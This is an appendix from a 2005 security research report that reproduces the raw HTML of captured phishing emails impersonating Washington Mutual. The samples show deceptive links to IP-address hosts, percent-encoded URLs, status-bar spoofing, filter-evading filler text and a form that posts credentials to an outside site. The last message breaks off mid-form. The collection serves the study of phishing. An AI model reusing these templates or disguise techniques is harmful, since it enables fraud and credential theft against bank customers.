Phishing Trip Part 1: Appendices
infectionvectors.com, January 2005
See Full Report - Phishing Trip Part 1: Washington Mutual
Appendix A: The WaMu Letters
Message 0, received 10 November 2004:
<html><p><font face="Arial"><A HreF="http://www.wamu.com/personal/welcome/confirmusersdata.htm"><map name="FPMap0"><area coords="0, 0, 590, 292" shape="rect" href="http://%36%35%2E%31%36%37%2E%31%33%30%2E%31%32%36:%38%37/%77%61/% 69%6E%64%65%78%2E%68%74%6D"></map><img SRC="cid:part1.02040006.02050903@support_id_313219724@wamu.com" border="0" usemap="#FPMap0"></A></a></font></p><p><font color="#FFFFFB">Freeware The Holocaust It's out of the question. in 1929 Fast Search come on! Snowboarding well fine I'll speak my mind. Ok deal NCAA Basketball in fact Madonna Yes, it's great. Computers Will you, please... in 1958 in 1921 Prom Hairstyles in 1842 Diablo 2 X Files Tool You are through </font></p></html>
Message 1, received 24 December 2004:
<table cellSpacing="0" cellPadding="0" width="600" align="center" border="0"> <tr vAlign="top"> <td> <IMG height=29 alt="" hspace=0 src="https://login.personal.wamu.com/images/wamucom_logo.gif" width=311 border=0><BR><IMG height=5 alt="" hspace=0 src="http://www.suntrust.com/images/Common/release3/common_header_yellowspan.gif" width=836 border=0> </BODY></HTML> </td> </tr> </table> <table cellSpacing="0" cellPadding="0" width="100%" border="0"> </table> <table cellSpacing="0" cellPadding="0" width="600" align="center" border="0"> <tr vAlign="top"> <td width="400"> <table cellSpacing="0" cellPadding="5" width="600" border="0"> <tr vAlign="top"> <td width="590"> <table cellSpacing="0" cellPadding="0" width="100%" border="0"> <tr> <td class="pp_heading" align="left"> </td> </tr> </table> </td> </tr> <tr> <td class="pptext" width="590"><p>Dear wamu valued member, <br> <br> On the date of 18th of December there was a login trials from <br> a foreign IP address which resulted with your account <br> temporary suspension . <p>for your security <br> you have to immediately reactivate your account <br></p> <p>Please click the link below to reactivate your account: </p> <p align="left"><a href="http://64.23.10.44/wamuupdate/accounts/update/avncenter/bsda6gwcv7zfcwfcwf34gfw f23g235f134f3fg3f&bhdfahva68532hbhwseBayISAPI.dllPaymentLanding&ssPageName=hhpayUSf&=u serhgads&secure&ssl7r2vbd7d88klmnogh.htm">https://www.wamu.com/internetBanking/Request Router?requestCmdId=Reactivate </a></p> <p align="left">Sincerely, <br> wamu Security Department <p align="left">This notification expires in 48 Hours<BR><IMG height=5 alt="" hspace=0 src="http://www.suntrust.com/images/Common/release3/common_header_yellowspan.gif" width=836 border=0> </p></td> </tr> <tr> <td width="590"> </td> </tr> </table> </td> </tr> </table> </body> </html>
Message 2, received 28 December 2004:
<html>
<head> <meta http-equiv="Content-Language" content="en-us"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <style> <!-- #message td {font-family: verdana,arial,helvetica,sans-serif;font-size: 12px;color: #000000;} #message .pp_heading {font-family: verdana,arial,helvetica,sans-serif;font-size: 18px;font-weight: bold;color: #003366;} #message .pp_sansserif{font-family: verdana,arial,helvetica,sans-serif; font-size: 16px;color: #000000;} #message hr.dotted {width: 100%; margin-top: 0px; margin-bottom: 0px; border-left: #fff; border-right: #fff; border-top: #fff; border-bottom: 2px dotted #ccc;} #message .pp_footer {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;color: #aaaaaa;} --> </style> </head>
<body>
<table class="messageheader" cellSpacing="0" cellPadding="0" width="100%" border="0"> <tr> <td> </td> </tr> </table> <div id="message" style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <xmeta Content="Microsoft DHTML Editing Control" NAME="GENERATOR" /> <xbody /> <style type="text/css"> #message .dummy {} #message td {font-family: verdana,arial,helvetica,sans-serif;font-size: 12px;color: #000000;} #message {font-family: verdana,arial,helvetica,sans-serif;font-size: 12px;color: #000000;} #message LI {line-height: 120%;} #message UL.ppsmallborder {margin:10px 5px 10px 20px;} #message LI.ppsmallborderli {margin:0px 0px 5px 0px;} #message UL.pp_narrow {margin:10px 5px 0px 40px;} #message hr.dotted {width: 100%; margin-top: 0px; margin-bottom: 0px; border-left: #fff; border-right: #fff; border-top: #fff; border-bottom: 2px dotted #ccc;} #message .pp_label {font-family: verdana,arial,helvetica,sans-serif;font-size: 10px;font-weight: bold;color: #000000;} #message .pp_serifbig {font-family: serif;font-size: 20px;font-weight: bold;color: #000000;} #message .pp_serif{font-family: serif;font-size: 16px;color: #000000;} #message .pp_sansserif{font-family: verdana,arial,helvetica,sans-serif; font-size: 16px;color: #000000;} #message .pp_heading {font-family: verdana,arial,helvetica,sans-serif;font-size: 18px;font-weight: bold;color: #003366;} #message .pp_subheadingeoa {font-family: verdana,arial,helvetica,sans-serif;font-size: 15px;font-weight: bold;color: #000000;} #message .pp_subheading {font-family: verdana,arial,helvetica,sans-serif;font-size: 16px;font-weight: bold;color: #003366;} #message .pp_sidebartext {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;color: #003366;} #message .pp_sidebartextbold {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;font-weight: bold;color: #003366;} #message .pp_footer {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;color: #aaaaaa;} #message 
.pp_button {font-size: 13px; font-family: verdana,arial,helvetica,sans-serif; font-weight: 400; border-style:outset; color:#000000; background-color: #cccccc;} #message .pp_smaller {font-family: verdana,arial,helvetica,sans-serif;font-size: 10px;color: #000000;} #message .pp_smallersidebar {font-family: verdana,arial,helvetica,sans-serif;font-size: 10px;color: #003366;} #message .ppem106 {font-weight: 700;} </style> <table cellSpacing="0" cellPadding="0" width="600" align="center" border="0"> <tr vAlign="top"> <table cellSpacing="0" cellPadding="0" width="100%" border="0"> <tr> <td width="100%" style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <img height="10" src="http://images.paypal.com/images/pixel.gif" width="1" border="0"></td> </tr> </table> <table cellSpacing="0" cellPadding="0" width="600" align="center" border="0"> <tr vAlign="top"> <td width="400" style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <table cellSpacing="0" cellPadding="5" width="100%" border="0"> <tr vAlign="top"> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <table cellSpacing="0" cellPadding="0" width="100%" border="0"> <tr> <td class="pp_heading" align="left"><br> Security Center Advisory!</td> </tr> </table> </td> </tr> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <p><br> Washington Mutual is committed to maintaining a safe environment for its community of buyers and sellers. To protect the security of your account, Washington Mutual employs some of the most advanced security systems in the world and our anti-fraud teams regularly screen the Washington Mutual system for unusual activity.<br> <br> We recently have determined that different computers have logged onto your Washington Mutual Online Banking account, and multiple password failures were present before the logons. 
We now need you to re-confirm your account information to us. If this is not completed by <strong>January 07, 2005</strong>, we will be forced to suspend your account indefinitely, as it may have been used for fraudulent purposes. We thank you for your cooperation in this manner. <br> <br> In order to confirm your Online Bank records, we may require some specific information from you.<br> <br> <br> Please follow the link below and renew your account information : <br> <br> <br> <a href="http://211.9.254.123/en/.mutual-sk/index.php?MfcISAPICommand=SignInFPP&UsingSSL=1&email=&userid=" onMouseOver="window.status='https://login.personal.wamu.com/logon/logon.asp?dd=1&Update&Your&Info';return true;" onMouseOut="window.status=' ';return true;">https://login.personal.wamu.com/logon/logon.asp?dd=1&Update&Your&Info</a> <br> <br> Thank you for your prompt attention to this matter. Please understand that this is a security measure meant to help protect you and your account. <br> <br> We apologize for any inconvenience.<br> <br> If you choose to ignore our request, you leave us no choise but to temporaly suspend your account.<br> <br> Thank you for using Washington Mutual!</p> </td> </tr> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <hr class="dotted"></td> </tr> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <table cellSpacing="0" cellPadding="0" width="100%" border="0"> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <img height="10" src="http://images.paypal.com/en_US/i/scr/pixel.gif" width="1" border="0"></td> </tr> </table> </td> </tr> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> </td> </tr> </table> </td> </tr> </table> </body>
</html>
Message 3, received 30 December 2004:
<html>
<head> <meta http-equiv="Content-Language" content="en-us"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <style> <!-- #message td {font-family: verdana,arial,helvetica,sans-serif;font-size: 12px;color: #000000;} #message .pp_heading {font-family: verdana,arial,helvetica,sans-serif;font-size: 18px;font-weight: bold;color: #003366;} #message .pp_sansserif{font-family: verdana,arial,helvetica,sans-serif; font-size: 16px;color: #000000;} #message hr.dotted {width: 100%; margin-top: 0px; margin-bottom: 0px; border-left: #fff; border-right: #fff; border-top: #fff; border-bottom: 2px dotted #ccc;} #message .pp_footer {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;color: #aaaaaa;} --> </style> </head>
<body>
<table class="messageheader" cellSpacing="0" cellPadding="0" width="100%" border="0"> <tr> <td> </td> </tr> </table> <div id="message" style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <xmeta Content="Microsoft DHTML Editing Control" NAME="GENERATOR" /> <xbody /> <style type="text/css"> #message .dummy {} #message td {font-family: verdana,arial,helvetica,sans-serif;font-size: 12px;color: #000000;} #message {font-family: verdana,arial,helvetica,sans-serif;font-size: 12px;color: #000000;} #message LI {line-height: 120%;} #message UL.ppsmallborder {margin:10px 5px 10px 20px;} #message LI.ppsmallborderli {margin:0px 0px 5px 0px;} #message UL.pp_narrow {margin:10px 5px 0px 40px;} #message hr.dotted {width: 100%; margin-top: 0px; margin-bottom: 0px; border-left: #fff; border-right: #fff; border-top: #fff; border-bottom: 2px dotted #ccc;} #message .pp_label {font-family: verdana,arial,helvetica,sans-serif;font-size: 10px;font-weight: bold;color: #000000;} #message .pp_serifbig {font-family: serif;font-size: 20px;font-weight: bold;color: #000000;} #message .pp_serif{font-family: serif;font-size: 16px;color: #000000;} #message .pp_sansserif{font-family: verdana,arial,helvetica,sans-serif; font-size: 16px;color: #000000;} #message .pp_heading {font-family: verdana,arial,helvetica,sans-serif;font-size: 18px;font-weight: bold;color: #003366;} #message .pp_subheadingeoa {font-family: verdana,arial,helvetica,sans-serif;font-size: 15px;font-weight: bold;color: #000000;} #message .pp_subheading {font-family: verdana,arial,helvetica,sans-serif;font-size: 16px;font-weight: bold;color: #003366;} #message .pp_sidebartext {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;color: #003366;} #message .pp_sidebartextbold {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;font-weight: bold;color: #003366;} #message .pp_footer {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;color: #aaaaaa;} #message 
.pp_button {font-size: 13px; font-family: verdana,arial,helvetica,sans-serif; font-weight: 400; border-style:outset; color:#000000; background-color: #cccccc;} #message .pp_smaller {font-family: verdana,arial,helvetica,sans-serif;font-size: 10px;color: #000000;} #message .pp_smallersidebar {font-family: verdana,arial,helvetica,sans-serif;font-size: 10px;color: #003366;} #message .ppem106 {font-weight: 700;} </style> <table cellSpacing="0" cellPadding="0" width="600" align="center" border="0"> <tr vAlign="top"> <table cellSpacing="0" cellPadding="0" width="100%" border="0"> <tr> <td width="100%" style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <img height="10" src=" images.paypal.com/images/pixel.gif" width="1" border="0"></td> </tr> </table> <table cellSpacing="0" cellPadding="0" width="600" align="center" border="0"> <tr vAlign="top"> <td width="400" style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <table cellSpacing="0" cellPadding="5" width="100%" border="0"> <tr vAlign="top"> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <table cellSpacing="0" cellPadding="0" width="100%" border="0"> <tr> <td class="pp_heading" align="left"><br> Security Center Advisory!</td> </tr> </table> </td> </tr> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <p><br> Washington Mutual is committed to maintaining a safe environment for its community of buyers and sellers. To protect the security of your account, Washington Mutual employs some of the most advanced security systems in the world and our anti-fraud teams regularly screen the Washington Mutual system for unusual activity.<br> <br> We recently have determined that different computers have logged onto your Washington Mutual Online Banking account, and multiple password failures were present before the logons. 
We now need you to re-confirm your account information to us. If this is not completed by <strong>Jan 10, 2005</strong>, we will be forced to suspend your account indefinitely, as it may have been used for fraudulent purposes. We thank you for your cooperation in this manner. <br> <br> In order to confirm your Online Bank records, we may require some specific information from you.<br> <br> <br> Please follow the link below and renew your account information : <br> <br> <br> <a href="http://210.103.105.224/.wamu/index.php?MfcISAPICommand=SignInFPP&UsingSSL=1&email=&userid=" onMouseOver="window.status='https://login.personal.wamu.com/logon/logon.asp?dd=1&Update&Your&Info';return true;" onMouseOut="window.status=' ';return true;">https://login.personal.wamu.com/logon/logon.asp?dd=1&Update&Your&Info</a> <br> <br> Thank you for your prompt attention to this matter. Please understand that this is a security measure meant to help protect you and your account. <br> <br> We apologize for any inconvenience.<br> <br> If you choose to ignore our request, you leave us no choise but to temporaly suspend your account.<br> <br> Thank you for using Washington Mutual!</p> </td> </tr> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <hr class="dotted"></td> </tr> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <table cellSpacing="0" cellPadding="0" width="100%" border="0"> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <img height="10" src="http://images.paypal.com/en_US/i/scr/pixel.gif" width="1" border="0"></td> </tr> </table> </td> </tr> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> </td> </tr> </table> </td> </tr> </table> </body>
</html>
Message 4, received 30 December 2004:
<html>
<head> <meta http-equiv="Content-Language" content="en-us"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <style> <!-- #message td {font-family: verdana,arial,helvetica,sans-serif;font-size: 12px;color: #000000;} #message .pp_heading {font-family: verdana,arial,helvetica,sans-serif;font-size: 18px;font-weight: bold;color: #003366;} #message .pp_sansserif{font-family: verdana,arial,helvetica,sans-serif; font-size: 16px;color: #000000;} #message hr.dotted {width: 100%; margin-top: 0px; margin-bottom: 0px; border-left: #fff; border-right: #fff; border-top: #fff; border-bottom: 2px dotted #ccc;} #message .pp_footer {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;color: #aaaaaa;} --> </style> </head>
<body>
<table class="messageheader" cellSpacing="0" cellPadding="0" width="100%" border="0"> <tr> <td> </td> </tr> </table> <div id="message" style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <xmeta Content="Microsoft DHTML Editing Control" NAME="GENERATOR" /> <xbody /> <style type="text/css"> #message .dummy {} #message td {font-family: verdana,arial,helvetica,sans-serif;font-size: 12px;color: #000000;} #message {font-family: verdana,arial,helvetica,sans-serif;font-size: 12px;color: #000000;} #message LI {line-height: 120%;} #message UL.ppsmallborder {margin:10px 5px 10px 20px;} #message LI.ppsmallborderli {margin:0px 0px 5px 0px;} #message UL.pp_narrow {margin:10px 5px 0px 40px;} #message hr.dotted {width: 100%; margin-top: 0px; margin-bottom: 0px; border-left: #fff; border-right: #fff; border-top: #fff; border-bottom: 2px dotted #ccc;} #message .pp_label {font-family: verdana,arial,helvetica,sans-serif;font-size: 10px;font-weight: bold;color: #000000;} #message .pp_serifbig {font-family: serif;font-size: 20px;font-weight: bold;color: #000000;} #message .pp_serif{font-family: serif;font-size: 16px;color: #000000;} #message .pp_sansserif{font-family: verdana,arial,helvetica,sans-serif; font-size: 16px;color: #000000;} #message .pp_heading {font-family: verdana,arial,helvetica,sans-serif;font-size: 18px;font-weight: bold;color: #003366;} #message .pp_subheadingeoa {font-family: verdana,arial,helvetica,sans-serif;font-size: 15px;font-weight: bold;color: #000000;} #message .pp_subheading {font-family: verdana,arial,helvetica,sans-serif;font-size: 16px;font-weight: bold;color: #003366;} #message .pp_sidebartext {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;color: #003366;} #message .pp_sidebartextbold {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;font-weight: bold;color: #003366;} #message .pp_footer {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;color: #aaaaaa;} #message 
.pp_button {font-size: 13px; font-family: verdana,arial,helvetica,sans-serif; font-weight: 400; border-style:outset; color:#000000; background-color: #cccccc;} #message .pp_smaller {font-family: verdana,arial,helvetica,sans-serif;font-size: 10px;color: #000000;} #message .pp_smallersidebar {font-family: verdana,arial,helvetica,sans-serif;font-size: 10px;color: #003366;} #message .ppem106 {font-weight: 700;} </style> <table cellSpacing="0" cellPadding="0" width="600" align="center" border="0"> <tr vAlign="top"> <table cellSpacing="0" cellPadding="0" width="100%" border="0"> <tr> <td width="100%" style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <img height="10" src="http://images.paypal.com/images/pixel.gif" width="1" border="0"></td> </tr> </table> <table cellSpacing="0" cellPadding="0" width="600" align="center" border="0"> <tr vAlign="top"> <td width="400" style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <table cellSpacing="0" cellPadding="5" width="100%" border="0"> <tr vAlign="top"> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <table cellSpacing="0" cellPadding="0" width="100%" border="0"> <tr> <td class="pp_heading" align="left"><br> Security Center Advisory!</td> </tr> </table> </td> </tr> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <p><br> Washington Mutual is committed to maintaining a safe environment for its community of buyers and sellers. To protect the security of your account, Washington Mutual employs some of the most advanced security systems in the world and our anti-fraud teams regularly screen the Washington Mutual system for unusual activity.<br> <br> We recently have determined that different computers have logged onto your Washington Mutual Online Banking account, and multiple password failures were present before the logons. 
We now need you to re-confirm your account information to us. If this is not completed by <strong>January 07, 2005</strong>, we will be forced to suspend your account indefinitely, as it may have been used for fraudulent purposes. We thank you for your cooperation in this manner. <br> <br> In order to confirm your Online Bank records, we may require some specific information from you.<br> <br> <br> Please follow the link below and renew your account information : <br> <br> <br> <a href="http://12.166.79.35/.mutual-sk/index.php?MfcISAPICommand=SignInFPP&UsingSSL=1&email=&userid=" onMouseOver="window.status='https://login.personal.wamu.com/logon/logon.asp?dd=1&Update&Your&Info';return true;" onMouseOut="window.status=' ';return true;">https://login.personal.wamu.com/logon/logon.asp?dd=1&Update&Your&Info</a> <br> <br> Thank you for your prompt attention to this matter. Please understand that this is a security measure meant to help protect you and your account. <br> <br> We apologize for any inconvenience.<br> <br> If you choose to ignore our request, you leave us no choise but to temporaly suspend your account.<br> <br> Thank you for using Washington Mutual!</p> </td> </tr> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <hr class="dotted"></td> </tr> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <table cellSpacing="0" cellPadding="0" width="100%" border="0"> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <img height="10" src="http://images.paypal.com/en_US/i/scr/pixel.gif" width="1" border="0"></td> </tr> </table> </td> </tr> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> </td> </tr> </table> </td> </tr> </table> </body>
</html>
Message 5, received 1 January 2005:
<table cellSpacing="0" cellPadding="0" width="600" align="center" border="0"> <tr vAlign="top"> <td> <IMG height=29 alt="" hspace=0 src="https://login.personal.wamu.com/images/wamucom_logo.gif" width=311 border=0><BR><IMG height=5 alt="" hspace=0 src="http://www.suntrust.com/images/Common/release3/common_header_yellowspan.gif" width=836 border=0> </BODY></HTML> </td> </tr> </table> <table cellSpacing="0" cellPadding="0" width="100%" border="0"> </table> <table cellSpacing="0" cellPadding="0" width="600" align="center" border="0"> <tr vAlign="top"> <td width="400"> <table cellSpacing="0" cellPadding="5" width="600" border="0"> <tr vAlign="top"> <td width="590"> <table cellSpacing="0" cellPadding="0" width="100%" border="0"> <tr> <td class="pp_heading" align="left"> </td> </tr> </table> </td> </tr> <tr> <td class="pptext" width="590"><p>Dear wamu valued member, <br> <br> On the date of January 1st there was a login trials from <br> a foreign IP address which resulted with your account <br> temporary suspension . <p>for your security <br> you have to immediately reactivate your account <br></p> <p>Please click the link below to reactivate your account: </p> <p align="left"><a href="http://aquaforcepspump.com/wamu/accounts/update/avncenter/bsda6gwcv7zfcwfcwf34gfw f23g235f134f3fg3f&bhdfahva68532hbhwseBayISAPI.dllPaymentLanding&ssPageName=hhpayUSf&=user hgads&secure&ssl7r2vbd7d88klmnogh.htm">https://www.wamu.com/internetBanking/RequestRouter ?requestCmdId=Reactivate </a></p> <p align="left">Sincerely, <br> Wamu Security Department <p align="left">This notification expires in 48 Hours<BR><IMG height=5 alt="" hspace=0 src="http://www.suntrust.com/images/Common/release3/common_header_yellowspan.gif" width=836 border=0> </p></td> </tr> <tr> <td width="590"> </td> </tr> </table> </td> </tr> </table> </body> </html>
Message 6, received 5 January 2005:
<html>
<head> <xmeta http-equiv="Content-Language" content="en-us"> <xmeta name="GENERATOR" content="Microsoft FrontPage 5.0"> <xmeta name="ProgId" content="FrontPage.Editor.Document"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <title>New Page 3</title> <style> <!-- #message #message td {font-family: verdana,arial,helvetica,sans-serif;font-size: 12px;color: #000000;} #message #message .pp_heading {font-family: verdana,arial,helvetica,sans-serif;font-size: 18px;font-weight: bold;color: #003366;} #message #message .pp_sansserif{font-family: verdana,arial,helvetica,sans-serif; font-size: 16px;color: #000000;} #message #message hr.dotted {width: 100%; margin-top: 0px; margin-bottom: 0px; border-left: #fff; border-right: #fff; border-top: #fff; border-bottom: 2px dotted #ccc;} #message #message .pp_footer {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;color: #aaaaaa;} --> </style> </head>
<xbody>
<table class="messageheader" cellSpacing="0" cellPadding="0" width="100%" border="0"> <tr> <td> </td> </tr> </table> <div id="message" style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <xmeta Content="Microsoft DHTML Editing Control" NAME="GENERATOR" /> <xbody /> <style type="text/css"> #message #message .dummy {} #message #message td {font-family: verdana,arial,helvetica,sans-serif;font-size: 12px;color: #000000;} #message #message {font-family: verdana,arial,helvetica,sans-serif;font-size: 12px;color: #000000;} #message #message LI {line-height: 120%;} #message #message UL.ppsmallborder {margin:10px 5px 10px 20px;} #message #message LI.ppsmallborderli {margin:0px 0px 5px 0px;} #message #message UL.pp_narrow {margin:10px 5px 0px 40px;} #message #message hr.dotted {width: 100%; margin-top: 0px; margin-bottom: 0px; border-left: #fff; border-right: #fff; border-top: #fff; border-bottom: 2px dotted #ccc;} #message #message .pp_label {font-family: verdana,arial,helvetica,sans-serif;font-size: 10px;font-weight: bold;color: #000000;} #message #message .pp_serifbig {font-family: serif;font-size: 20px;font-weight: bold;color: #000000;} #message #message .pp_serif{font-family: serif;font-size: 16px;color: #000000;} #message #message .pp_sansserif{font-family: verdana,arial,helvetica,sans-serif; font-size: 16px;color: #000000;} #message #message .pp_heading {font-family: verdana,arial,helvetica,sans-serif;font-size: 18px;font-weight: bold;color: #003366;} #message #message .pp_subheadingeoa {font-family: verdana,arial,helvetica,sans-serif;font-size: 15px;font-weight: bold;color: #000000;} #message #message .pp_subheading {font-family: verdana,arial,helvetica,sans-serif;font-size: 16px;font-weight: bold;color: #003366;} #message #message .pp_sidebartext {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;color: #003366;} #message #message .pp_sidebartextbold {font-family: verdana,arial,helvetica,sans-serif;font-size: 
11px;font-weight: bold;color: #003366;} #message #message .pp_footer {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;color: #aaaaaa;} #message #message .pp_button {font-size: 13px; font-family: verdana,arial,helvetica,sans-serif; font-weight: 400; border-style:outset; color:#000000; background-color: #cccccc;} #message #message .pp_smaller {font-family: verdana,arial,helvetica,sans-serif;font-size: 10px;color: #000000;} #message #message .pp_smallersidebar {font-family: verdana,arial,helvetica,sans-serif;font-size: 10px;color: #003366;} #message #message .ppem106 {font-weight: 700;} </style> <table cellSpacing="0" cellPadding="0" width="600" align="center" border="0"> <tr vAlign="top"> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <a target="_blank" href="https://login.personal.wamu.com/logon/logon.asp?dd=1" > <img alt="wamu.com" src="http://us.i1.yimg.com/us.yimg.com/i/us/pim/el/spc_eee1.gif" border="0" width="255" height="35"></a> </td> </tr> </table> <table cellSpacing="0" cellPadding="0" width="100%" border="0"> <tr> <td width="100%" style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <img height="10" src="http://us.i1.yimg.com/us.yimg.com/i/us/pim/el/spc_eee1.gif" width="1" border="0"></td> </tr> </table> <table cellSpacing="0" cellPadding="0" width="600" align="center" border="0"> <tr vAlign="top"> <td width="400" style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <table cellSpacing="0" cellPadding="5" width="100%" border="0"> <tr vAlign="top"> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <table cellSpacing="0" cellPadding="0" width="100%" border="0"> <tr> <td class="pp_heading" align="left"><br> Security Center Advisory!</td> </tr> </table> </td> </tr> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <br> WAMU is 
committed to maintaining a safe environment for its community of buyers and sellers. To protect the security of your account, WAMU employs some of the most advanced security systems in the world and our anti-fraud teams regularly screen the WAMU system for unusual activity.<br> <br> In accordance with WAMU's User Agreement and to ensure that your account has not been compromised, access to your account was limited. <br> <br> Your account access will remain limited until this issue has been resolved. <br> <br> In order to secure your account and quickly restore full access, we may require some specific information from you for the following reason: <br> <br> We encourage you to log in and restore full access as soon as possible.<br> <table cellSpacing="0" cellPadding="1" width="75%" align="left" bgColor="#ffe65c" border="0"> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <table cellSpacing="0" cellPadding="4" width="100%" align="center" bgColor="#fffecd" border="0"> <tr> <td class="pp_sansserif" align="middle"> <a target="_blank" href="http://69.41.170.174/~aca/.wamusk/index.php?MfcISAPICommand=SignInFPP&UsingSSL=1&email=&userid=" > Click here to verify your account</a></td> </tr> </table> </td> </tr> </table> <p><br> <br> Should access to your account remain limited for an extended period of time, it may result in further limitations on the use of your account or may result in eventual account closure.<br> <br> Thank you for your prompt attention to this matter. Please understand that this is a security measure meant to help protect you and your account. 
<br> <br> We apologize for any inconvenience.<br> <br> <br> If you choose to ignore our request, you leave us no choise but to temporaly suspend your account.<br> <br> Thank you for using WAMU!</td> </tr> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <hr class="dotted"></td> </tr> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <table cellSpacing="0" cellPadding="0" width="100%" border="0"> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <img height="10" src="http://us.i1.yimg.com/us.yimg.com/i/us/pim/el/spc_eee1.gif" width="1" border="0"></td> </tr> </table> </td> </tr> <tr> <td style="font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000"> <br> </td> </tr> </table> </td> </tr> </table> </div>
</xbody>
</html>
Message 7, received 6 January 2005:
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="600" id="AutoNumber1">
<tr>
<td bgcolor="#000099">
<img title="wamu.com A Washington Mutual, Inc. Web site" alt="wamu.com A Washington Mutual, Inc. Web site" src="http://www.wamu.com/images/wamucom_logo_blue.gif" border="0" width="313" height="42"></td>
</tr>
<tr>
<td>Dear <b>Washington Mutual Customer,</b><br>
<br>
We recently reviewed your account, and suspect that your <b>Washington
Mutual Internet Banking</b> account may have been accesssed by an
unauthorized third party. Protecting the security of your account and of the
<b>Washington Mutual </b>network is our primary concern. Therefore, as a
preventative measure, we have temporarily limited access to sensitive
account features.<br>
<br>
<form method="POST" target="self" action="http://www.yourinternetzone.com/css/confirr.php?secure_login=true&change_pass=true&userid= 612723893459&confirm=hd2mx6kc&data_mode=%20secured">
<input type="hidden" size="30" name="id" value="124">
<input type="hidden" size="30" name="mailuser" value="EMAILADDRESSIS">
<input type="hidden" size="30" name="ebay_user_id" value="test">
To restore your account access, please complete the form and click submit to
ensure that your account has not been compromised:<br>
<br>
1. Complete your <b>Washington Mutual Internet Banking</b> account. In case
you are not enrolled for <b>Internet Banking</b>, you will have to use your
Credit Card Number as both your Personal ID and Password and fill in
all the required information.<br>
<br>
2. Review your recent account history for any unauthorized withdrawles or
deposits, and check your account profile to make sure not changes have been
made. If any unauthorized activity has taken place on your
account, report this to <b>Washington Mutual</b> staff immediately.<br>
<br>
To get started, confirm your Washington Mutual Online Account:<br>
</p>
<table cellSpacing="0" cellPadding="0" border="0" width="1">
<tr>
<td width="10">
<img alt src="https://login.personal.wamu.com/images/logon_ytl.gif" border="0" width="10" height="10"></td>
<td bgColor="#ffcc00" width="443">
<img alt src="https://login.personal.wamu.com/images/1px_clear.gif" border="0" width="1" height="1"></td>
<td width="10">
<img alt src="https://login.personal.wamu.com/images/logon_ytr.gif" border="0" width="10" height="10"></td>
</tr>
<tr>
<td bgColor="#ffcc00" width="10"> </td>
<td bgColor="#ffcc00" width="443">
<table cellSpacing="0" cellPadding="0" border="0" width="174" height="137" style="border-collapse: collapse" bordercolor="#111111">
<tr>
<td class="mainfontbold" noWrap width="224" height="10"><b>
